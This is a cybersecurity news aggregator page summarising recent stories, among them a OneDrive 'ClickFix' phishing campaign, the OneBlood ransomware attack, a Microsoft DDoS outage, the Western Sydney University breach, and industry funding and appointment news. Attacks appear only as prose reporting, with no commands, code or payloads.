Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Cybersecurity Startu ...

 Firewall Daily

Cybersecurity startup WhizHack has announced a successful Pre-Series A funding round and has secured $3 million in funding, bringing its valuation to an impressive over $100 million. This investment was led by SAAA Capital, a prominent investment firm based in Singapore that has been a key supporter of WhizHack's   show more ...

journey. Founded in November 2020, WhizHack has swiftly established itself as a pioneering force in the cybersecurity industry. The company has achieved remarkable growth, expanding its operations by over 200% annually and increasing shareholder value by more than 50 times within just three years. This WhizHack Pre-Series A funding round highlights the innovative approach of the business toward providing cybersecurity solutions.  WhizHack Pre-Series A Funding Round Raises $3 Million Over $100 Million Valuation WhizHack’s Pre-Series A funding round marks a critical milestone for the company, setting the stage for further expansion and development. The funds will enhance their research and development efforts, particularly through collaborations with top universities in the USA and India. This strategic investment aligns with WhizHack's ambitious plans to raise a Series A round in early 2025, with some of the world’s largest private equity firms already indicating their interest. The company's growth has been strongly supported by SAAA Capital, which has been involved with WhizHack since its early days. SAAA Capital, known for its focus on emerging technology companies, has played a crucial role in the company's success. Alongside SAAA Capital, other early investors in WhizHack include Rising Star from the Netherlands and Rahul Chawla, Managing Director at Deutsche Bank in India. Founded by three industry veterans with a collective experience of over 100 years in managing global deep-tech businesses and startups, WhizHack operates through three main divisions. These include the development of proprietary security products, offering global managed security services, and delivering scalable security training designed to empower both enterprises and government entities. Key Takeaways from the WhizHack Pre-Series A Funding Round One of WhizHack's standout innovations is its ZeroHack platform, which is designed to detect and mitigate advanced cyber-attacks on operational technology (OT) and information technology (IT) networks. This platform is recognized for its unparalleled speed, accuracy, and cost-effectiveness, and is currently utilized by major institutions across South East Asia, the Middle East, and Africa, including critical infrastructure, defense, and educational institutions. In the past year, WhizHack has made significant strides in securing high-profile clients from various sectors, including banking, manufacturing, FMCG, airports, power system operation centers (SOCs), and state governments. The company has successfully competed against some of the most renowned global cybersecurity players, demonstrating its competitive edge in the industry. With the increasing threat of cyber terrorism, particularly from state actors, WhizHack is concentrating on advancing its OT security products for cyber-physical systems (CPS), a niche with few global competitors. Kallol Sil, Co-founder and CEO of WhizHack expressed his appreciation for SAAA Capital’s continued support, stating, "We value SAAA Capital's trust and commitment to our vision. The new capital will enable us to accelerate our R&D initiatives and strengthen our collaborations with leading universities. We are excited about our upcoming Series A round and the opportunity to expand into North America and Europe, with several major private equity firms showing interest." Ashish Patil, Managing Director of SAAA Capital, also praised WhizHack's progress, saying, "We are proud to have partnered with WhizHack and witnessed their exceptional growth. The company's in-house developed suite of cybersecurity products and services competes at the highest level. 

image for U.S. Customs and Bor ...

 Cybersecurity News

The U.S. Customs and Border Protection (CBP) agency has released a guide detailing how travelers can opt out of biometric facial recognition technology at airports and other ports of entry. The guide was released as the agency continues to expand its use of facial comparison systems for identity verification at   show more ...

airports and seaports across America, while also addressing privacy concerns raised by some lawmakers and civil liberties groups. U.S. Customs and Border Protection Facial Biometrics The CBP has implemented facial biometrics at all international airports for entry processes, known as Simplified Arrival, and at 53 airport locations for exit procedures. The technology has also been expanded to 39 seaports and all pedestrian lanes at both Southwest and Northern Border ports of entry. [caption id="attachment_84688" align="alignnone" width="1878"] Source: https://www.cbp.gov/travel/biometrics[/caption] Earlier, Diane J. Sabatino, Acting Executive Assistant Commissioner, Office of Field Operations, of the U.S. Customs and Border Protection stated, "CBP is excited to expand the use of facial biometrics through public/private partnerships to further secure and enhance travel while protecting the privacy of all travelers." [caption id="attachment_84687" align="alignnone" width="2190"] Source: https://www.cbp.gov/travel/biometrics[/caption] According to CBP, the use of facial biometric comparison technology has allowed the agency to process more than 540 million travelers and prevent over 2,000 impostors from entering the U.S. The agency touts the technology as a way to make existing travel requirements more efficient, creating a more seamless, secure, and safer experience for travelers. The implementation of biometric technology stems from the 9/11 Commission Report that authorized the U.S. Government to use an automated system to record the arrivals and departures of visitors at all air, sea and land ports of entry. As technologies have evolved, facial comparison has proven to be one of the most effective solutions. Opt-Out Provisions and Privacy Concerns Despite the benefits, CBP acknowledges that some U.S. citizens may not wish to participate in facial photo capture. The agency stresses that its traveler identity verification process is not a surveillance program, with cameras and signage clearly visible to inform passengers about the technology. CBP also states that it adheres to all applicable privacy rules and regulations, retaining U.S. citizen photos for no more than 12 hours after identity verification. On the TSA website's FAQ, in response to the question of whether the facial processing is necessary for all passengers, it states, "No. Participation in the testing of biometric technology is voluntary. Passengers may notify a TSA officer if they do not wish to participate and instead go through the standard ID verification process." What Does the Guide Entail? The guide outlines the process for travelers who do not wish to participate in the biometric facial comparison technology. According to the guide, U.S. citizens who do not wish to submit to facial photo capture can request alternative processing, which typically involves a manual review of their travel documents by a CBP officer. This option is available for both domestic and international travelers.

image for Kim Jong Un Now has ...

 Cyber Warfare

North Korea's cyber capabilities are expanding at an alarming rate, posing a significant threat to global security. Local media in South Korea citing a recent intelligence report, confirmed that the reclusive nation has bolstered its cyber workforce by 20% in just two years, bringing the total number of hackers to   show more ...

a staggering 8,400. This number stood at 6,800 personnel, as per the Defense Whitepaper 2022. This rapid growth, fueled by economic desperation and Kim Jong Un's strategic vision, has transformed cyber warfare into a cornerstone of the regime's ambitions. North Korea's 'Hacker University' The Reconnaissance General Bureau, the regime's intelligence arm, is at the heart of this cyber expansion. Operating under the direct supervision of Kim Jong Un, the bureau has established a "hacker university" to cultivate a new generation of cyber talent. By relaxing strict social hierarchies, North Korea has opened up opportunities for individuals from all walks of life to join the program, creating a deep pool of potential recruits. Jong Un reportedly instructed to not consider background while training hackers and select only talented individuals. In North Korea, social status, such as residence and occupation, is usually strictly determined based on bloodline, but he declared that exceptions would be made for only those who join the hacking training program. Pyongyang's leadership is on the lookout of young math and computer talents to lead them down the path of cybercrime. The regime's motivation is clear: financial gain. With international sanctions crippling the North Korean economy, cybercrime has emerged as a critical revenue stream. Hacking groups such as Lazarus and Kimsuky, linked to the Reconnaissance General Bureau, have become notorious for their audacious attacks, targeting everything from cryptocurrency exchanges to government agencies. The proceeds from these cyberheists are funneled directly into the regime's nuclear and missile programs. A senior intelligence source referring to the mount of money that hacking can bring, assessed that "the North Korean leadership has high expectations [from these hackers].” Developing Malware with Russia? The burgeoning partnership between North Korea and Russia is another cause of serious concerns. The recent signing of a comprehensive strategic partnership treaty, which includes provisions for cooperation in information and communications technology security, suggests a formal framework for cyber collaboration. The intelligence authorities believe that the two have already laid the foundation for joint research and mutual education on hacking technology through this treaty.  A government source said, “It appears that North Korea and Russia are jointly developing or sharing core malware used in hacking.” This alliance could lead to a dangerous exchange of expertise and resources, potentially elevating the threat level posed by both nations. Experts warn that North Korea's cyber tactics are becoming increasingly sophisticated and aggressive. The regime is no longer content with targeting specific, high-value targets. Instead, it is adopting a broader, more indiscriminate approach, casting a wider net in search of vulnerable systems. This shift in strategy, coupled with the rapid growth of its cyber workforce, makes North Korea a formidable and unpredictable adversary in the digital realm.  As North Korea continues to invest heavily in its cyber capabilities, the international community must remain vigilant. Developing robust cybersecurity defenses, sharing intelligence, and imposing stricter sanctions on the regime are essential steps in mitigating this growing threat.

image for RBI Tightens Noose o ...

 Cybersecurity News

Reserve Bank of India (RBI), the country’s apex financial institution, has issued new directions to bolster cybersecurity and resilience of the digital payment ecosystem in India. On July 30, the apex bank issued ‘Master Directions on Cyber Resilience and Digital Payment Security Controls for non-bank Payment   show more ...

System Operators (PSOs)’. “These directions aim to enhance the safety and security of payment systems operated by PSOs, establishing a robust framework for overall information security preparedness with a particular focus on cyber resilience,” RBI said in its notification. Applicability of Digital Payment Security Norms The new directives apply to all authorized non-bank PSOs and their associated unregulated entities, including payment gateways, third-party service providers, and vendors. The PSOs are required to ensure that these entities adhere to the directions through mutual agreements and organizational policies approved by their boards. RBI said the approach is designed to effectively identify, monitor, control, and manage cyber and technology-related risks arising from the integration of various entities within the digital payments ecosystem. Digital Payment Security Measures and Controls The RBI's directions mandate PSOs to facilitate mechanisms for online alerts based on parameters such as failed transactions, transaction velocity, excessive activity, geo-location, IP address origin, and behavioral biometrics. These measures aim to detect and prevent fraudulent activities and enhance transaction security. When sending alerts via SMS, email, or other notifications, PSOs and their participants must ensure that sensitive information, such as bank account and card numbers, is redacted or masked. Online payment transactions must clearly display the merchant's name and transaction amount, while OTP-based authentication messages should include the OTP at the end and refer to the specific transaction, RBI said in its master directions. Furthermore, PSOs must provide facilities on their mobile applications or websites that allow customers to identify and report fraudulent transactions instantly. This feature ensures seamless and immediate notification to the issuer of the payment instrument. Mobile Payment Security Practices PSOs offering mobile payment services are required to implement stringent security practices and risk mitigation measures. These include ensuring that mobile applications are free from anomalies, maintaining authenticated sessions with robust encryption protocols, and implementing device binding or fingerprinting for mobile applications. PSOs must also ensure that online sessions are terminated after a period of inactivity and that customers are promptly notified of failed login or authentication attempts, as per the new directions. Additionally, RBI added that PSOs must establish control mechanisms to detect the presence of remote access applications and prohibit access to mobile payment applications while remote access is active. Card Payment Security Measures For card payments, PSOs must ensure that terminals installed at merchant locations for capturing card details are validated against the PCI-P2PE (Payment Card Industry-Point to Point Encryption) program. POS terminals with PIN entry for card payments must be approved by the PCI-PTS (Payment Card Industry-PIN Transaction Security) program, ensuring that they meet the highest security standards, RBI said. Governance and Cyber Security Preparedness The governance of information security risks, including cyber risk and cyber resilience, lies with the Board of Directors of the PSO. A sub-committee of the Board, headed by a member with expertise in information and cyber security, may be delegated primary oversight responsibilities, said the new guidelines. This sub-committee is required to meet at least once every quarter to review and manage these risks. Further, RBI said that PSOs must formulate a Board-approved Information Security (IS) policy to manage potential information security risks across all applications and products related to payment systems. This policy must be reviewed annually and cover various aspects, including roles and responsibilities, measures to identify and manage cyber security risks, and processes for training and awareness. A distinct Board-approved Cyber Crisis Management Plan (CCMP) must be prepared by PSOs to detect, contain, respond to, and recover from cyber threats and attacks, RBI said. Additionally, PSOs are required to implement a comprehensive data leak prevention policy to ensure the confidentiality, integrity, and availability of business and customer information. This includes securing data both in transit and at rest, adhering to PCI-DSS guidelines, and regularly testing backup data to ensure recovery without loss of transactions or audit trails. The RBI also emphasized the importance of business continuity planning (BCP), directing PSOs to develop a BCP based on various cyber threat scenarios, including extreme but plausible events. The plan should be reviewed annually and include detailed incident response, resumption, and recovery procedures to manage cybersecurity events or incidents, said RBI. Implementation Timeline The new directions will take effect from April 2025 for large non-bank PSOs, April 2026 for medium non-bank PSOs, and April 2028 for small non-bank PSOs. Entities such as CCIL, NPCI, Payment Aggregators, TReDS, and large PPI issuers are classified as large non-bank PSOs, while cross-border Money Transfer Operators (MTSS) and medium PPI issuers are categorized as medium non-bank PSOs. Small PPI issuers and Instant Money Transfer Operators are considered small non-bank PSOs.

image for OneDrive Phishing Ca ...

 Cybersecurity News

A new phishing campaign targeting Microsoft OneDrive users has been observed, employing social engineering tactics to trick victims into executing malicious PowerShell scripts. The campaign exploits users' urgency to access files and their trust in legitimate-seeming software interfaces. OneDrive Phishing Campaign   show more ...

Attack Sequence Researchers from Trellix observed that the campaign begins with an email containing an .html file, which, when opened, displays an image designed to create a sense of urgency about accessing a document. The image simulates a Microsoft OneDrive page displaying a file named "Reports.pdf" and a window titled "Error 0x8004de86" with an error message claiming that the "OneDrive" cloud service needs to be updated. Two buttons, "Details" and "How to fix," are presented, with the latter triggering a function call and loading secondary instructions. This combination of technical jargon and urgent error messages is a classic social engineering tactic, designed to manipulate the user's emotions and prompt hasty action. [caption id="attachment_84709" align="alignnone" width="717"] Source: https://www.trellix.com/[/caption] The attack sequence unfolds as follows: the user is instructed to click on a button that purportedly explains how to fix a DNS issue, in the process compromising their system. The user is then asked to open the Quick Link menu, access the Windows PowerShell terminal and paste the malicious commands for execution as a supposed measure for implementing the OneDrive cloud service update. The command downloads an archive file, extracts its contents, and executes a script using AutoIt3.exe. Ultimately, the attack displays a success message, claiming that the operation has been completed. Global Reach and Enterprise Implications The campaign has affected users worldwide, with significant activity detected in the United States, India, and the United Kingdom. For businesses, this attack poses a serious threat. A single compromised employee could potentially lead to widespread network infiltration, data breaches, and financial losses. [caption id="attachment_84708" align="alignnone" width="1016"] Source: https://www.trellix.com/[/caption] To combat such attacks, organizations must: Implement robust employee training programs focused on recognizing phishing attempts. Enforce strict security protocols, including email filtering and attachment scanning. Regularly update and patch systems to close potential vulnerabilities. Foster a culture of cybersecurity awareness throughout the organization. Campaigns of this nature that attempt to trick users into executing malicious PowerShell scripts - often contain malware such as remote access Trojans (RATs) and infostealers such as DarkGate, Lumma and Vidar - have been commonly dubbed by security researchers as 'ClickFix' attacks or 'ClearFake.'

image for Ransomware Strikes U ...

 Ransomware News

A ransomware attack is impacting the software system of OneBlood, a blood donation non-profit that serves hundreds of hospitals in the southeastern U.S. "Our team reacted quickly to assess our systems and began an investigation to confirm the full nature and scope of the event. Our comprehensive response efforts   show more ...

are ongoing and we are working diligently to restore full functionality to our systems as expeditiously as possible,” said Susan Forbes, OneBlood senior vice president of corporate communications and public relations. OneBlood Reverts to Manual Processes OneBlood said it continues to collect, test and distribute blood, but its operations are at "a significantly reduced capacity." The non-profit has implemented manual processes and procedures as a business continuity plan and to remain operational. But these processes take significantly longer to perform and impacts inventory availability. "In an effort to further manage the blood supply we have asked the more than 250 hospitals we serve to activate their critical blood shortage protocols and to remain in that status for the time being,” said Forbes. The national blood community is assisting OneBlood and the hospitals and patients it serves to manage the flow of supplies. Blood centers across the country are also lending a helping hand by sending sending blood and platelets to OneBlood. The AABB Disaster Task Force is coordinating national resources to assist with additional blood products being sent to OneBlood. OneBlood said that all blood types are needed, but there is a more urgent requirement for O Positive, O Negative and Platelet donations, at the moment, as these are universal donor groups and are medically considered safe for all patients. “The blood supply cannot be taken for granted. The situation we are dealing with is ongoing. If you are eligible to donate, we urge you to please make an appointment to donate as soon as possible,” Forbes said. Similar to Ransomware Attack on NHS England A similar ransomware incident impacted two major London hospitals in June, which disrupted its blood sampling operations and reduced testing volume by 96%. The two hospitals are still reeling through the aftermath of the ransomware attack from Russian Qilin ransomware actors nearly two months later, with thousands of surgeries and emergency operations postponed or being shifted to other facilities. As seen in the case of OneBlood, the NHS at the time made a similar O blood group donation request as the attack caused significant disruption on the hospitals’ ability to match patients’ blood types. It is not clear if the two attacks are linked. Editors Note: This is an evolving situation and the article will be updated with any additional information.

image for Microsoft Services H ...

 Firewall Daily

Days after Microsoft experienced a major global outage that disrupted its services, the company is grappling with another setback as a cyberattack has caused nearly ten hours of service disruption. The Microsoft cyberattack has disrupted several services, including the popular email platform Outlook and the widely   show more ...

played video game Minecraft, according to a company disclosure. Preliminary findings indicated that a Distributed Denial-of-Service (DDoS) attack had initially triggered the outage, but an error in Microsoft’s defensive measures exacerbated the situation. The cyberattack on Microsoft began on July 30, 2024, and led to widespread issues across various Microsoft services. According to a statement from the company, "While the initial trigger event was a Distributed Denial-of-Service (DDoS) attack... initial investigations suggest that an error in the implementation of our defenses amplified the impact of the attack rather than mitigating it." DDoS attacks are known for overwhelming websites or online services with excessive traffic to render them inoperable. Response and Mitigation Against Microsoft Cyberattack Microsoft's response included a fix that reportedly showed signs of improvement, but the company continued to monitor the situation to ensure a full recovery. In a public apology on X (formerly Twitter), Microsoft acknowledged the inconvenience caused to users and stated, “We're sorry to hear you're running into issues with our services. Our experts are currently investigating the situation in order to resolve it as soon as possible. You can find updates here: https://msft.it/6017ljML3. We sincerely apologize for the inconvenience.” [caption id="attachment_84733" align="alignnone" width="750"] Source: Microsoft[/caption] The impact of the Microsoft cyberattack extended beyond its own products. Services dependent on Microsoft's platforms were also affected. For instance, Cambridge Water reported issues with their website and services due to the outage. They explained, "Due to worldwide issues with Microsoft Azure, a problem with our website is affecting several services including MyAccount and PayNow." [caption id="attachment_84735" align="alignnone" width="598"] Source: Cambridge Water[/caption] Other organizations felt the ripple effects as well. The HM Courts and Tribunals Service, which oversees the administration of various courts and tribunals in England and Wales, noted problems with multiple online services. Financial institutions like NatWest also experienced disruptions, with a bank spokesperson commenting, “We are aware that some customers experienced difficulties accessing our webpages today. This was linked to the issues reported by Microsoft Azure which has affected some Microsoft services globally.” The timing of the cyberattack on Microsoft was particularly inconvenient for FC Twente, a top Dutch football team, which saw its ticketing website and club app become inaccessible to fans. The outage came just hours before Microsoft was scheduled to release its latest financial update, adding to the company's challenges. The Stages of Microsoft Cyberattack and Linked Outages The recent Microsoft outage followed a series of earlier disruptions affecting Microsoft's Azure cloud platform. In July, several incidents highlighted the platform's vulnerabilities. On July 30, between 11:45 UTC and 19:43 UTC, an unexpected surge in traffic from a DDoS attack led to the Azure Front Door outage. The attack's effects were exacerbated by an error in Microsoft's defensive measures, though the company implemented networking changes and failovers to resolve the issue by 20:48 UTC.  Earlier, on July 19, Windows virtual machines suffered startup failures due to a problematic update from CrowdStrike's Falcon agent, which caused continuous restart loops until recovery instructions were published. Additionally, from 21:40 UTC on July 18 to 02:55 UTC on July 19, Azure Storage experienced disruptions in the Central US region due to incomplete updates to virtual machine host address lists, with recovery efforts involving halting the update process and executing failovers, achieving full restoration by the early hours of July 19. These incidents have led Microsoft to reassess and improve its systems. To mitigate future risks, the company has outlined several measures. Completed improvements include fixing storage to allow list-generation workflows, enhancing failover policies for SQL databases, and refining fail-back workflows for Cosmos DB. Upcoming improvements are set to address various aspects of service resilience, such as implementing VM health checks and refining failover workflows. Professor Alan Woodward, a noted computer security expert, commented on the situation, "It seems slightly surreal that we’re experiencing another serious outage of online services from Microsoft. You’d expect Microsoft’s network infrastructure to be bomb-proof", reported BBC. This sentiment highlights the surprise and concern within the tech community regarding the repeated issues faced by one of the industry's leading companies. Microsoft's Azure cloud platform has been a key driver of the company's profitability in recent years. However, recent disruptions have rattled investors. Following the outage, Microsoft’s shares dropped by 2.7% in after-hours trading. Despite reporting a 15% increase in overall revenue to $64.7 billion and an 11% rise in profit to $22 billion for the April-June period, the company has faced scrutiny due to these service interruptions. For users and businesses relying on Microsoft’s services, the company advises configuring Azure Service Health alerts to stay informed about service issues and to implement disaster recovery strategies to minimize the impact of future outages.

image for WSU Data Breach Impa ...

 Cybersecurity News

In a follow-up to the May 2024 announcement regarding a Western Sydney University data breach of its Microsoft Office 365 environment, WSU has now confirmed that personal information stored in its Isilon storage platform was also subjected to unauthorized access. This platform holds 'My Documents' information,   show more ...

departmental shared folders, and some backup and archived data. In an official statement, the University noted, "We have been and will continue to analyze the very large and complex dataset to properly understand the impact the unauthorized access to Isilon has had on individuals’ personal information." Western Sydney University Data Breach: Key Findings The University has confirmed the following details regarding the Western Sydney University data breach: Scope of Access: Evidence shows that approximately 580 terabytes of data across 83 out of 400 directories in Isilon were accessed. Timeline: Unauthorized access to Isilon occurred between 9 July 2023 and 16 March 2024. Data Compromised: The initial review has found that personally identifiable information (PII) was accessed, including names, contact details, dates of birth, health information, sensitive workplace conduct and health and safety matters, government identification documents, tax file numbers, superannuation details, and bank account information. Extent of WSU Data Breach: Based on the forensic investigation to date, there is no evidence that this incident extends beyond the University’s Microsoft Office 365 and Isilon environments. Current Situation The University has not received any threats to disclose private information or demands in exchange for maintaining privacy. Furthermore, dark web monitoring has revealed no evidence that the data has been uploaded. No further unauthorized access to Isilon has been detected since remediation efforts took place. The University continues to work with authorities to investigate the perpetrator of the Isilon incident. Since the initial discovery of unauthorized access to its IT network in January 2024, the University has been conducting forensic investigations to determine the full nature, scope, and scale of the incident. This public notification, issued on 31 July 2024, aims to inform the University community, including former and current students and staff, about the unauthorized access to the Isilon storage platform. University’s Response and Actions Western Sydney University has been proactive in addressing the breach. The University has engaged Australia’s leading digital forensics and incident response team, CyberCX, and relevant authorities, including: National Office of Cyber Security Office of the Australian Information Commissioner NSW Information and Privacy Commission (IPC) Australian Federal Police Australian Cyber Security Centre Australian Signals Directorate Home Affairs NSW Police Force’s Cybercrime Squad under Strike Force GIRRAKOOL To protect its community, the University secured an interim injunction from the NSW Supreme Court to prevent access, use, transmission, and publication of any data that was accessed without authorization. The University’s leadership and Board have implemented several measures to mitigate the issue and enhance protection, including: Completing a password reset Enhancing detection monitoring Implementing additional firewall protection Increasing the cyber security team capacity Reviewing data storage and retention practices On 31 July 2024, the University communicated directly with its community through emails to students, staff, and alumni, providing information on protective steps and available support services. Next Steps The University will continue to notify individuals about the impact on their personal information in the coming weeks. Due to the volume and complexity of the data, individual notifications may not be possible for all those affected. The public notification aims to keep the community vigilant for any signs that their data may have been accessed. The University has engaged IDCARE, Australia’s national identity and cyber support service, to offer free advice and support to those concerned about protecting themselves from identity theft. For more information on protecting personal information, visit IDCARE or call 1800 595 160, quoting reference number WESSYDPB24. An online Get Help form is also available. The University has established a dedicated phone line for additional support and inquiries: 02 9174 6942 (Monday to Friday, 9.00am to 4.30pm AEST). Western Sydney University remains committed to rectifying this matter transparently and keeping the community informed as the investigation progresses. The University unreservedly apologizes for the incident and its impact on the community.

image for Securonix Appoints K ...

 Appointments

Securonix, Inc., a leader in Security Information and Event Management (SIEM) and a five-time Gartner Magic Quadrant Cybersecurity leader, has announced the appointment of Kash Shaikh as its new President and Chief Executive Officer, effective immediately. In addition to his executive role, Shaikh will also join the   show more ...

company’s Board of Directors. Kash Shaikh brings over 30 years of experience in business transformation and delivering innovative technology solutions to global enterprise organizations. His most recent role was as President and CEO of Virtana, a leading provider of hybrid-cloud infrastructure observability solutions. Kash Shaikh: An Experienced Leader Takes the Helm Prior to Virtana, Shaikh served as Global Vice President and General Manager for Dell’s Enterprise Solutions Unit. He has also held key leadership and executive positions at Ruckus Wireless, Hewlett Packard, Cisco, and Nortel Networks. “I am honored to join Securonix, a pioneer in the cybersecurity industry and a five-time leader in the Gartner Magic Quadrant for SIEM. With its best-in-class, innovative unified platform offering SIEM, SOAR, and UEBA, Securonix is at a pivotal moment for both the company and the industry,” said Shaikh. “As the chosen SIEM provider by 1,000 of the world’s largest and most respected enterprise customers, Securonix is well-positioned for its next phase of profitable growth. The company’s success relies on continuous innovation and strong relationships with customers and partners. I am excited to bring my customer-centric approach and servant leadership to achieve our mission of securing the world by staying ahead of cyber threats.” Nadeem Syed, Senior Managing Director and Head of Value Creation at Vista Equity Partners and Securonix board member, expressed his confidence in Shaikh’s leadership. “Kash is a veteran, customer-focused technology executive with extensive experience leading and scaling businesses providing mission-critical software products to enterprise customers around the world. We look forward to working closely with Kash and the entire Securonix team during this exciting next phase of accelerated profitable growth.” A Transition in Leadership Kash Shaikh succeeds Nayaki Nayyar, who has decided to step down to focus on public Board service. During her tenure, Nayyar led the company on a path toward profitable growth and further advanced its strong legacy of innovation by introducing the Unified Defense SIEM and Securonix EON – AI-Reinforced CyberOps Platform. Company's unified platform, which includes SIEM, Security Orchestration, Automation, and Response (SOAR), and User and Entity Behavior Analytics (UEBA), is recognized for its advanced capabilities. The company’s continuous innovation in integrating AI across all layers of its platform positions it as a leader in the cybersecurity industry. As organization embarks on this new chapter under the leadership of Kash Shaikh, the company is poised for significant growth and innovation. With a strong focus on customer-centric solutions and a commitment to advancing its technology, Securonix aims to maintain its leadership in the cybersecurity industry and continue providing top-tier protection against evolving cyber threats.

image for Justice Department A ...

 Cybersecurity News

The U.S. Department of Justice filed an appeal challenging the light sentencing of Conor Fitzpatrick, popularly known in the cybercriminal underworld as "Pompompurin." Fitzpatrick had received only 17 days of time served for charges related to the operation of BreachForums and possession of child pornography   show more ...

content on his personal devices. Prosecutors argue the sentence was unreasonably light given the severity of Fitzpatrick's crimes and his violation of pretrial release conditions. The district court judge cited Fitzpatrick's mental health issues as a key factor for its lenient sentencing. Conor Fitzpatrick Mental Diagnosis vs. Crime Severity The DOJ contends the judge placed excessive weight on Fitzpatrick's mental health, neglecting other crucial sentencing factors. Prosecutors argue that while Fitzpatrick's condition should be considered, it shouldn't overshadow the seriousness of his offenses or negate the need for deterrence and public protection. The appeal cites the earlier case of United States v. Zuk, where a sentence was vacated due to supposed overemphasis on the defendant's autism diagnosis. The DOJ claims Fitzpatrick's case goes further than the previous case, with the judge making unsupported assumptions about Fitzpatrick's personal ability to cope with prison life and the belief that he would not receive adequate mental health treatment in prison. The DOJ felt Fitzpatrick had demonstrated awareness of his actions' illegality, citing his activities in helping forum members evade law enforcement, manage his own online criminal activities including the brokering of hundreds of thousands of dollars' worth of deals, despite his diagnosis. The opening brief by the DOJ stated: "There is also no question that Fitzpatrick knew what he was doing was wrong. He even helped one BreachForums member who feared law enforcement scrutiny delete his or her IP address from the site. (JA129) He promised another user that he would falsify registration information should law enforcement ever request it, jokingly stating that he “doubt[ed] law enforcement would even bother making legal requests to a hacking forum lmao[.]" The following point are mentioned in the table of contents as arguments against the reasoning of the sentence: [caption id="attachment_84833" align="alignnone" width="1084"] Source: Dissent Doe (DataBreaches.net)[/caption] Implications and Public Message The prosecution raised concerns about the broader implications of such a lenient sentence. They argue it fails to deter similar crimes, undermines respect for the law, and creates significant sentencing disparities. The prosecution points out several inconsistencies and unsupported conclusions in the district court's decision which they believe do not hold up to scrutiny and reality. The appeal against the sentencing raises important questions about the impact of Fitzpatrick's sentence on the public and the justice system. Justice Department's appeal seeks to ensure that Fitzpatrick's sentence is revised to reflect the seriousness of his crimes and to maintain public trust in the justice system, stressing on the need to deliver the right message to other individuals engaging in similar crimes as well as victims of  child pornography and fraud.

image for Ransomware Payments ...

 Firewall Daily

Ransomware payments have touched a new milestone — with many hacker groups claiming large sums of ransom payments that were never seen before. According to a recent ransomware report, a single company recently paid a ransom of $75 million, highlighting the dramatic rise in financial demands. This increase in ransom   show more ...

amounts reflects a broader trend of escalating financial demands. In 2023, total ransomware payments exceeded $1 billion, emphasizing the severe economic impact of these cyber threats. Ransomware attacks have become more frequent and severe, with the report indicating a 17.8% increase in blocked ransomware attempts and a 57.8% rise in attacks identified through data leak sites. The manufacturing, healthcare, and technology sectors have been particularly targeted, with the manufacturing industry bearing the brunt of these attacks. Analyzing the 2024 Ransomware Report The sophistication of ransomware tactics has reached new heights. The ThreatLabz 2024 ransomware report observes a disturbing trend where attackers are not only targeting organizations but also their executives' families to demand higher ransoms. This shift highlights a broader and more dangerous approach to ransomware, where no sector, whether large corporations or small to medium-sized enterprises, is immune. Operations like "Operation Endgame" and "Operation Duck Hunt" have been pivotal in disrupting ransomware activities. Despite these efforts, prominent ransomware groups continue to evolve and evade capture, often operating with relative impunity. The resilience and adaptability of these groups pose ongoing challenges for law enforcement. The report details several critical findings from April 2023 to April 2024. Among them is the emergence of 19 new ransomware families, bringing the total number to 391. The most active families during this period include LockBit, BlackCat (also known as ALPHV), and 8Base, with LockBit leading the pack with 22.1% of attacks. Software and system vulnerabilities remain a primary vector for ransomware attacks, highlighting the necessity for prompt patching and robust zero-trust architecture. Additionally, voice-based social engineering has become a notable method for gaining access to corporate networks, as evidenced by groups like Scattered Spider and Qakbot. The Impact of Major Ransomware Groups Among the ransomware groups that have emerged recently, five stand out for their impact on organizations and governments globally. These groups—Dark Angels, LockBit, BlackCat (ALPHV), Akira, and Black Basta—have made significant headlines due to their high-profile attacks and substantial ransom demands. Dark Angels has become a major player in the ransomware arena since its emergence in May 2022. Operating the Dunghill data leak site, Dark Angels is known for executing some of the largest ransomware attacks on record. In early 2024, ThreatLabz reported that one of Dark Angels' victims paid a record $75 million ransom. This staggering figure underscores the group's strategy of targeting a few high-value companies to secure substantial payouts. LockBit, which began operations in September 2019, continues to be a dominant force in the ransomware landscape. With its extensive affiliate network, LockBit has compromised over 2,000 systems worldwide, collecting more than $120 million in ransom. Known for its high-volume attack approach, LockBit often targets smaller businesses with relatively low ransom demands. Despite a major disruption in February 2024, when the FBI and UK authorities seized parts of LockBit’s infrastructure and approximately 7,000 decryption keys, the group quickly adapted and resumed its activities. The indictment of LockBit developer Dmitry Yuryevich Khoroshev further illustrates ongoing efforts to tackle this threat. BlackCat (ALPHV), infamous for its cross-platform capabilities, was a major ransomware threat until its shutdown in March 2024. Utilizing the Rust programming language, BlackCat targeted various operating systems. Although the group has disbanded, its affiliates are likely continuing their activities within other ransomware-as-a-service networks. Akira, which emerged in April 2023, quickly gained notoriety for its high volume of attacks. Likely an offshoot of the now-defunct Conti group, Akira has employed ransomware code similar to Conti’s leaked source code. Despite significant law enforcement actions, such as Operation Endgame targeting the initial access broker Bumblebee, Akira remains active and is expected to persist in its operations. Black Basta, identified in April 2022 as another successor to the Conti group, has used various methods to infiltrate corporate networks, including leveraging the initial access broker Qakbot. Despite setbacks from Operation Duck Hunt and other disruptions, Black Basta continues to innovate and execute new attacks. Looking Ahead: 2025 Predictions As ransomware threats evolve, several key trends are set to shape the cybersecurity industry in 2025, as highlighted in the ransomware report. Among these trend, one section that caught everyone's attention is the rise of highly targeted attack strategies. Groups like Dark Angels are setting a precedent by focusing on a few high-value targets for substantial ransoms, which may influence other threat actors to adopt similar approaches. Another trend is the use of voice-based social engineering by specialized initial access brokers such as Qakbot and Scattered Spider, who will likely continue to exploit this tactic to infiltrate corporate networks. Generative AI is also expected to play a significant role in ransomware attacks, enabling threat actors to create more convincing and personalized attacks, including AI-generated voice impersonations. Additionally, increased transparency in cybersecurity is anticipated due to new SEC rules mandating stricter incident reporting, which should lead to improved practices. High-volume data exfiltration attacks, which exploit the fear of data leaks rather than relying on encryption, are expected to rise. The healthcare sector will remain a prime target due to its valuable data, necessitating enhanced security measures. Finally, international collaboration will be crucial in disrupting global ransomware networks and combating cybercrime effectively.

image for Phase-by-phase SIEM ...

 Business

Weve already written about how, since a medium-sized company is an attractive target for cybercriminals, it cant be protected with just basic tools; it needs layered defenses. And a security information and event management (SIEM) system is a logical choice for a main center for such a multi-protection-layer system.   show more ...

